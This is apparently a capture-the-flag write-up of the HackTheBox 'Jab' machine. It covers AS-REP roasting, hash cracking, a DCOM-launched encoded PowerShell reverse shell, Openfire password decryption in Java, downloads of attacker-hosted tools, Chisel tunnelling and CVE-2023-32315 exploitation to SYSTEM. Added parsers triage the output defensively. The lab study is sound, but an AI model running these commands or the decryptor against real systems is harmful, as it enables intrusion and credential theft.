JAB

Recon

nmap_scan.log

DNS (Port 53)

Nothing interesting so far

└─$ dig any 10.10.11.4

; <<>> DiG 9.19.21-1-Debian <<>> any 10.10.11.4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54326
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;10.10.11.4.                    IN      ANY

;; AUTHORITY SECTION:
.                       3450    IN      SOA     a.root-servers.net. nstld.verisign-grs.com. 2024051901 1800 900 604800 86400

;; Query time: 8 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (TCP)
;; WHEN: Sun May 19 17:00:05 EDT 2024
;; MSG SIZE  rcvd: 114

Note: since it's an actual DNS server, we could add it to /etc/resolv.conf

SMB (139,445)

└─$ smbclient --no-pass -L //jab.htb
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to jab.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

After cracking passwords from [[#Jabber/XMPP]]:

└─$ netexec smb jab.htb -u jmontgomery -p Midnight_121 --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\jmontgomery:Midnight_121
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share

LDAP (389)

Certificate gives us domain name and DC domain name

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ tail -1 /etc/hosts
10.10.11.4   jab.htb DC01.jab.htb

enum4linux came up empty-handed... hmm.

HTTP (47001)


No directory came up even with raft-medium-directories.txt wordlist and no subdomains were found for this port.

Jabber/XMPP

A few services are running this protocol, so let's see what's going on.

Jabber: https://jabber.at/clients/ Client: https://pidgin.im

woyag:space

Not sure what happened, but after entering the server IP it wouldn't let me log in as woyag

New account: woyag2:Password123$

Add hostname to /etc/hosts

There seem to be 2 rooms:

  • test: says registration is required
  • test2: seems odd.


Looking around the client's features, we can enumerate users:

bdavis@conference.jab.htb shows as Offline

Accounts > Your Account > Search For Users > search.jab.htb > * > All Users

We can utilize the Debug Window to get the table data; just repeat the actions so the debug window logs them:

Kerberos Users

Parse usernames:

from bs4 import BeautifulSoup as BS

# table.xml is the search-result stanza copied out of Pidgin's Debug Window.
# The lxml parser lowercases tag and attribute names, but attribute values
# keep their case, so matching var="Username" still works.
with open('./table.xml') as f:
    xml = BS(f.read(), 'lxml')
    fields = xml.find_all('field', {'var': 'Username'})

# One username per line, ready for the Kerberos user file below.
with open('usernames.txt', 'w') as f:
    for field in fields:
        print(field.text.strip(), file=f)

Now we can try these usernames against the Kerberos service (with -no-preauth, what comes back is AS-REP data for accounts that don't require pre-authentication, which is what hashcat mode 18200 cracks below):

Impacket’s GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account’s password, which can then be bruteforced offline. source

└─$ impacket-GetUserSPNs -no-preauth "NO_PREAUTH_USER" -usersfile usernames.txt  -dc-host "DC01.jab.htb" "jab.htb/" | tee kerberos.log
...
$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:4aeb86801c44b732b4de82d7004afe6c$8a8fdaff91773c899f61b2b50cf40481256089e34a4349e2f6ef4725d18fdab101765df93aee827d7f442ace74dadf4164df2213bb4aaff56a69144d1d53762e3850caa8084ff32cbfa12684ec0283e4692fbc96ceae2c0fce37d0ccc6a8ff25a23e27701518b740fea9e3dc86ef0578f5bdc6cd0f25e4f46811d1d3a93bb1e4c3b6708fcf1ced57cc43d19d47286e57907a1b413f5aa8b3606806e9d32669568f0a9e9db3b1253c0fbda362a2c05507ed3da867aed21de13a16a848b868e667eb6261edf33a5bc88687e04dc9af3c63b8422f1d31d915a4f5b79a27d639323368ae
$krb5asrep$23$lbradford@jab.htb@JAB.HTB:c14b48505a62f5f7a6c9e3c772ab77ee$7ea3083f8453493d32a5f3fd4c508df137217747e9d4e47e1729c628f12962ec9d021944026b1b4ae0cd6c15f54f7d0d5820edb5c69b1894b5d891412e8c4d033fe884e6aefcea02929ab6f652c4065a3be6f1e16dd9b5e5b3802f3c2dda184781c147fa14901dbfd0794dd15335a44f748d4f2a770a1ce7d9a3ce228d3ff89388754a7b2cfddc9901ce73e9cc38cf78c142287a9b550d804315073050a3cc4253253c63a6ab87cefb8ea65c798dff93392d2a6714186fdfb15368cafab8d40fed86d410eefecde29a2f62a18752969a84127a0d087eb7c9567f93b3911c9a7f8dba
$krb5asrep$23$mlowe@jab.htb@JAB.HTB:39c3fd2a3374066f4be89c3a8ad76a0b$4685df20b5a18c4e74ad3c67ff2dfaf28785eae37ed1f4e51486e3725913665fc77ab0cf011a0277e9dfd8fc9cc0959b15e8c51ff8b0d9344ed0a2613ac49d10c4da7169d4a2c80669a427d4b38b632bd295b790e4741cbf39c228b15bc92f69154219f204528673d3b73352d1966951fd1b833570f3935af705927c996af4531ec4d382c53303859115e7e3fc282f34de2f0c441a57a65e3fe26efd4b7b91f662c48b6386fbdfcf67896eb00b16b0ec3b2ed00b50a5b9c78bd66dacfeb31ea4eb2c32bd623b08aefae6a8cb2e15a209b9d1d22f382674e0f3f8ddaa836931baecdb
...

➜ .\hashcat.exe -m 18200 -a 0 .\hashes .\rockyou.txt
$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:4aeb86801c44b732b4de82d7004afe6c$8a8fdaff91773c899f61b2b50cf40481256089e34a4349e2f6ef4725dd18fdab101765df93aee827d7f442ace74dadf4164df2213bb4aaff56a69144d1d53762e3850caa8084ff32cbfa12684ec0283e4692fbc96ceae2c0fce37d0ccc6a8fff25a23e27701518b740fea9e3dc86ef0578f5bdc6cd0f25e4f46811d1d3a93bb1e4c3b6708fcf1ced57cc43d19d47286e57907a1b413f5aa8b3606806e9d326695688f0a9e9db3b1253c0fbda362a2c05507ed3da867aed21de13a16a848b868e667eb6261edf33a5bc88687e04dc9af3c63b8422f1d31d915a4f5b79a27d639323368ae::Midnight_121

Creds: jmontgomery:Midnight_121
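As an added example (not part of the original writeup), a small Python parser for the impacket/hashcat output above: it turns each roast line, the AS-REP format seen here and the TGS-REP format that appears in the leaked chat log further down, into a remediation item (which account has pre-authentication disabled or an SPN, and whose password actually cracked). The sample lines are constructed from the page's hashes with the edata shortened.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Hash formats as printed by impacket and consumed by hashcat:
#   AS-REP  (-m 18200): $krb5asrep$<etype>$<principal>:<checksum>$<edata>
#   TGS-REP (-m 13100): $krb5tgs$<etype>$*<user>$<REALM>$<spn>*$<checksum>$<edata>
# A cracked line from hashcat carries the plaintext after the edata ("...<edata>::Midnight_121").
ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$([^:]+):([0-9a-fA-F]{32})\$([0-9a-fA-F]+)(?::+(.+))?$")
TGS_RE = re.compile(r"^\$krb5tgs\$(\d+)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)(?::+(.+))?$")

@dataclass
class RoastRecord:
    kind: str               # "asrep" or "tgs"
    etype: int              # 23 = RC4-HMAC, the legacy type that cracks fast
    user: str               # sAMAccountName
    realm: str
    spn: Optional[str]      # TGS records only
    cracked: Optional[str]  # plaintext when hashcat appended one

def _split_principal(principal: str):
    # "jmontgomery@jab.htb@JAB.HTB" (GetUserSPNs -no-preauth) or "jmontgomery@JAB.HTB" (GetNPUsers)
    user_part, _, realm = principal.rpartition("@")
    return user_part.split("@", 1)[0], realm

def parse_roast_line(line: str) -> Optional[RoastRecord]:
    """Parse one output line; None for anything that is not a complete hash (status text, <SNIP>)."""
    line = line.strip()
    m = ASREP_RE.match(line)
    if m:
        user, realm = _split_principal(m.group(2))
        return RoastRecord("asrep", int(m.group(1)), user, realm, None, m.group(5))
    m = TGS_RE.match(line)
    if m:
        return RoastRecord("tgs", int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(7))
    return None

def triage(lines):
    """One remediation item per roastable account, sorted by account name."""
    items = []
    for rec in filter(None, map(parse_roast_line, lines)):
        issue = ("Kerberos pre-authentication disabled (DONT_REQ_PREAUTH)" if rec.kind == "asrep"
                 else f"SPN {rec.spn} registered on a user account (Kerberoastable)")
        items.append({"account": rec.user, "realm": rec.realm, "issue": issue,
                      "etype": rec.etype, "cracked": rec.cracked is not None})
    return sorted(items, key=lambda item: item["account"])

def cracked_accounts(lines):
    """Accounts whose password fell to the wordlist: rotate these first."""
    return [item["account"] for item in triage(lines) if item["cracked"]]

# Constructed sample: the page's hashes with the edata shortened, one cracked in each format.
SAMPLE_OUTPUT = """\
$krb5asrep$23$jmontgomery@jab.htb@JAB.HTB:4aeb86801c44b732b4de82d7004afe6c$8a8fdaff91773c899f61b2b50cf40481::Midnight_121
$krb5asrep$23$lbradford@jab.htb@JAB.HTB:c14b48505a62f5f7a6c9e3c772ab77ee$7ea3083f8453493d32a5f3fd4c508df1
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870ce:!@#$%^&*(1qazxsw
[-] CCache file is not found. Skipping...
"""
```

Run `triage(SAMPLE_OUTPUT.splitlines())` to get the list; a hash cut short with `<SNIP>`, as in the chat log, is skipped rather than mis-parsed.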

I couldn't log in via WinRM and SMB had nothing either. Let's try the credentials against the XMPP service:

Leaked Account

(11/21/2023 01:31:13 PM) adunn: team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status?
(11/21/2023 01:33:58 PM) bdavis: sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate. 
(11/21/2023 02:30:41 PM) bdavis: here are the commands from the report, can you find someone from the security team who can re-run these to validate? 
(11/21/2023 02:30:43 PM) bdavis: $ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson
 
Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation
 
Password:
ServicePrincipalName  Name          MemberOf  PasswordLastSet             LastLogon  Delegation 
--------------------  ------------  --------  --------------------------  ---------  ----------
http/xmpp.jab.local   svc_openfire            2023-10-27 15:23:49.811611  <never>               
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP>

(11/21/2023 02:30:56 PM) bdavis: $ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt 

hashcat (v6.1.1) starting...

<SNIP>

$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$<SNIP>:!@#$%^&*(1qazxsw
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4
Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)
Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14336000/14344385 (99.94%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]
 
Started: Fri Oct 27 15:30:09 2023
Stopped: Fri Oct 27 15:30:29 2023

(11/21/2023 02:31:57 PM) adunn: I'll pass this along and circle back with the group
(11/21/2023 02:32:23 PM) bdavis: perfect, thanks Angela!
(11/21/2023 01:22:55 PM) The topic is: 

Creds: svc_openfire:!@#$%^&*(1qazxsw

Enum4linux dumps lots of information, mainly users and groups, which isn't helpful at the moment.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ enum4linux -u svc_openfire -p '!@#$%^&*(1qazxsw' -a jab.htb | tee enum4linux.log

RPC

https://book.hacktricks.xyz/network-services-pentesting/135-pentesting-msrpc#executing-a-rce-with-valid-credentials

Impacket’s dcomexec.py provides an interactive shell on the Windows host similar to wmiexec.py, but using varying DCOM endpoints. source

https://medium.com/@iamkumarraj/exploring-impacket-dcomexec-enhancing-active-directory-attack-capabilities-a9663d383703

impacket-dcomexec -object MMC20 <domain>/<username>:'<password>'@10.x.x.x 'cmd.exe /c powershell -e <reverseshell>' -silentcommand

impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'cmd.exe /c powershell -e <SNIP>' -silentcommand

User.txt

PS C:\users\svc_openfire> tree /f
Folder PATH listing
Volume serial number is E59D-A256
C:.
└───Desktop
        user.txt
PS C:\users\svc_openfire> cat desktop/user.txt
5b068fa3a3b9a30f8771f525c655d366

Privilege Escalation

PS C:\users\svc_openfire> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\users\svc_openfire> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users               Alias            S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

There are lots of Openfire processes running, worth checking out.

I don't think Choco has anything useful, so let's go to Openfire

Openfire

The version seems to be 4.7.5

PS C:\program files\Openfire> cat changelog.html | sls '<h2>.* -- <span' | select -first 5

<h2>4.7.5 -- <span style="font-weight: normal;">May 23, 2023</span></h2>
<h2>4.7.4 -- <span style="font-weight: normal;">November 9, 2022</span></h2>
<h2>4.7.3 -- <span style="font-weight: normal;">August 2, 2022</span></h2>
<h2>4.7.2 -- <span style="font-weight: normal;">July 13, 2022</span></h2>
<h2>4.7.1 -- <span style="font-weight: normal;">February 16, 2022</span></h2>

I already encountered Openfire, but version 4.7.4. [[Labs/HackTheBox/Seasonal/Season 5/SolarLab/Writeup|Writeup]]

Approach is the same:

PS C:\program files\Openfire\embedded-db> cat openfire.script | sls 'INSERT INTO (OFUSER|OFPROPERTY) VALUES' | sls admin

INSERT INTO OFUSER VALUES('admin','YgjeJXvFDf4dkSVd0v7ONC+MO8w=','3EHtXqOQxksAuSWAlW9BLaRapkE=','q6Ws2+ZEcDab+zFdBmYDQdWIaZwbfn6z',4096,NULL,'b3623187c74becad09de392aa14b0b08427dc47a78c232aa6bc63423d20e133c0473e10622652724989ca9655a8f87eff512c1ac13ac47cfa6ca3cd3687a81dd868a5cc48cef5a5e','Administrator','admin@jab.htb','001698357611581','0')
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','admin@jab.htb,svc_openfire@jab.htb',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.admin.className','org.jivesoftware.openfire.admin.DefaultAdminProvider',0,NULL)

PS C:\program files\Openfire\embedded-db> cat openfire.script | sls 'INSERT INTO (OFUSER|OFPROPERTY) VALUES' | sls passwordKey

INSERT INTO OFPROPERTY VALUES('passwordKey','zBgWeJBtP2RiZIu',0,NULL)
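An added example, not from the writeup: a Python reader for the openfire.script rows above. The ofUser/ofProperty column order is assumed from the Openfire 4.x schema. It tokenises the INSERT tuples, lists who may reach the admin console, and flags which stored passwords are recoverable by anyone who can read the file, since passwordKey sits in the same dump as the ciphertexts. The sample rows are the ones shown above.

```python
import re

# Column order of Openfire's ofUser and ofProperty tables (assumed from the Openfire 4.x schema).
OFUSER_COLUMNS = ("username", "storedKey", "serverKey", "salt", "iterations", "plainPassword",
                  "encryptedPassword", "name", "email", "creationDate", "modificationDate")
OFPROPERTY_COLUMNS = ("name", "propValue", "encrypted", "iv")
INSERT_RE = re.compile(r"^INSERT INTO (?:\w+\.)?(\w+) VALUES\((.*)\)\s*$")

def parse_values(body):
    """Tokenise the inside of VALUES(...): 'quoted' text ('' escapes a quote), NULL, integers."""
    vals, i, n = [], 0, len(body)
    while i < n:
        if body[i] in " ,":
            i += 1
        elif body[i] == "'":
            buf, i = [], i + 1
            while i < n and not (body[i] == "'" and body[i + 1:i + 2] != "'"):
                buf.append(body[i])
                i += 2 if body[i] == "'" else 1   # an escaped '' contributes one quote
            vals.append("".join(buf))
            i += 1                                # step over the closing quote
        else:
            j = (body + ",").index(",", i)        # unquoted token runs to the next comma
            tok = body[i:j].strip()
            vals.append(None if tok.upper() == "NULL" else int(tok) if tok.lstrip("-").isdigit() else tok)
            i = j
    return vals

def parse_script(text):
    """Collect ofUser rows and ofProperty entries from an HSQLDB openfire.script dump."""
    users, props = {}, {}
    for m in filter(None, map(INSERT_RE.match, text.splitlines())):
        table, values = m.group(1).upper(), parse_values(m.group(2))
        if table == "OFUSER" and len(values) == len(OFUSER_COLUMNS):
            row = dict(zip(OFUSER_COLUMNS, values))
            users[row["username"]] = row
        elif table == "OFPROPERTY" and len(values) == len(OFPROPERTY_COLUMNS):
            row = dict(zip(OFPROPERTY_COLUMNS, values))
            props[row["name"]] = (row["propValue"], row["encrypted"])
    return {"users": users, "properties": props}

def authorized_admins(text):
    """JIDs allowed into the admin console (the admin.authorizedJIDs property)."""
    value = parse_script(text)["properties"].get("admin.authorizedJIDs", ("", 0))[0]
    return [j.strip() for j in value.split(",") if j.strip()]

def recoverable_passwords(text):
    """Users whose password a reader of this file can recover: plaintext rows, plus Blowfish rows
    whenever passwordKey is stored in the same dump (as it is here)."""
    db = parse_script(text)
    key_present = "passwordKey" in db["properties"]
    return sorted(u for u, r in db["users"].items()
                  if r["plainPassword"] is not None or (key_present and r["encryptedPassword"] is not None))

# Sample: the rows shown above, one per line as HSQLDB writes them.
SAMPLE_SCRIPT = """\
INSERT INTO OFUSER VALUES('admin','YgjeJXvFDf4dkSVd0v7ONC+MO8w=','3EHtXqOQxksAuSWAlW9BLaRapkE=','q6Ws2+ZEcDab+zFdBmYDQdWIaZwbfn6z',4096,NULL,'b3623187c74becad09de392aa14b0b08427dc47a78c232aa6bc63423d20e133c0473e10622652724989ca9655a8f87eff512c1ac13ac47cfa6ca3cd3687a81dd868a5cc48cef5a5e','Administrator','admin@jab.htb','001698357611581','0')
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','admin@jab.htb,svc_openfire@jab.htb',0,NULL)
INSERT INTO OFPROPERTY VALUES('provider.admin.className','org.jivesoftware.openfire.admin.DefaultAdminProvider',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','zBgWeJBtP2RiZIu',0,NULL)
"""
```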
OpenFireDecryptPass.java

```java
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class OpenFireDecryptPass {
    public static void main(String[] argv) throws Exception {
        if (argv.length < 2) {
            System.out.println("[-] Please specify the encrypted password and the \"passwordKey\"");
            return;
        }

        // Openfire derives the Blowfish key from the SHA-1 digest of the passwordKey property
        MessageDigest md = MessageDigest.getInstance("SHA-1");
        byte[] keyParam = md.digest(argv[1].getBytes(StandardCharsets.UTF_8));

        // The stored hex blob is the 8-byte IV (16 hex chars) followed by the CBC ciphertext
        byte[] ivBytes = hex2bytes(argv[0].substring(0, 16));
        byte[] encryptedString = hex2bytes(argv[0].substring(16));

        IvParameterSpec iv = new IvParameterSpec(ivBytes);
        SecretKeySpec key = new SecretKeySpec(keyParam, "Blowfish");

        Cipher cipher = Cipher.getInstance("Blowfish/CBC/PKCS5Padding");
        cipher.init(Cipher.DECRYPT_MODE, key, iv);
        byte[] decrypted = cipher.doFinal(encryptedString);

        // Openfire encrypts the password's UTF-16 code units (two bytes per char, big-endian),
        // hence the 00 byte in front of every character in the hex output
        String decryptedString = bytes2hex(decrypted);
        System.out.println(new String(decrypted, StandardCharsets.UTF_16BE) + " (hex: " + decryptedString + ")");
    }

    public static byte[] hex2bytes(String str) {
        if (str == null || str.length() < 2) return null;
        int len = str.length() / 2;
        byte[] buffer = new byte[len];
        for (int i = 0; i < len; i++) {
            buffer[i] = (byte) Integer.parseInt(str.substring(i * 2, i * 2 + 2), 16);
        }
        return buffer;
    }

    public static String bytes2hex(byte[] data) {
        if (data == null) return null;
        StringBuilder str = new StringBuilder();
        for (byte b : data) {
            if ((b & 0xFF) < 16) str.append('0');
            str.append(Integer.toHexString(b & 0xFF));
        }
        return str.toString().toUpperCase();
    }
}
```

```bash
└─$ cp ../SolarLab/OpenFireDecryptPass.class .
└─$ java OpenFireDecryptPass b3623187c74becad09de392aa14b0b08427dc47a78c232aa6bc63423d20e133c0473e10622652724989ca9655a8f87eff512c1ac13ac47cfa6ca3cd3687a81dd868a5cc48cef5a5e zBgWeJBtP2RiZIu
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
odW!!mVfbXs304kskt!QAZDVGY&@ (hex: 006F0064005700210021006D00560066006200580073003300300034006B0073006B0074002100510041005A004400560047005900260040)
```

Creds: admin:odW!!mVfbXs304kskt!QAZDVGY&@

No luck with the admin password; looks like we need to exploit Openfire itself.

PS C:\users> cd $ENV:TEMP
PS C:\Windows\TEMP> curl -uri http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Windows\TEMP> .\rc.exe Administrator 'odW!!mVfbXs304kskt!QAZDVGY&@' cmd.exe -r 10.10.16.74:4444
[-] RunasCsException: LogonUser failed with error code: The user name or password is incorrect
PS C:\Windows\TEMP> .\rc.exe Administrator 'odW!!mVfbXs304kskt!QAZDVGY&@' whoami
[-] RunasCsException: LogonUser failed with error code: The user name or password is incorrect
PS C:\Windows\TEMP>

Port forwarding using Chisel:

PS C:\Users\svc_openfire> cmd /c echo %PROCESSOR_ARCHITECTURE%
AMD64

PS C:\Users\svc_openfire> curl -uri http://10.10.16.74/chisel_1.9.1_windows_amd64 -outfile chisel.exe
PS C:\Users\svc_openfire> ls chisel.exe
    Directory: C:\Windows\TEMP
Mode                LastWriteTime         Length Name                                                       
----                -------------         ------ ----                                                       
-a----        5/20/2024   5:50 AM        9006080 chisel.exe                                                 

PS C:\Users\svc_openfire> .\chisel.exe client 10.10.16.74:3000 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

Log in as admin: https://github.com/miko550/CVE-2023-32315

Upload jar file:

Execute powershell reverse shell:

powershell -e <SNIP>
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Jab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.4:57616.

PS C:\Program Files\Openfire\bin> whoami
nt authority\system
PS C:\Program Files\Openfire\bin> cd /users/administrator/desktop
PS C:\users\administrator\desktop> ls

    Directory: C:\users\administrator\desktop

Mode                LastWriteTime         Length Name                                                
----                -------------         ------ ----                                                
-ar---        5/19/2024   5:04 PM             34 root.txt                                            

PS C:\users\administrator\desktop> cat root.txt
1092b34c577d548e8cc7925cc1880ed4

Help used:

  • https://medium.com/@islem.meghnine/hackthebox-jab-writeup-4515ffad3bf7

  • https://blog.csdn.net/weixin_45557138/article/details/136919900
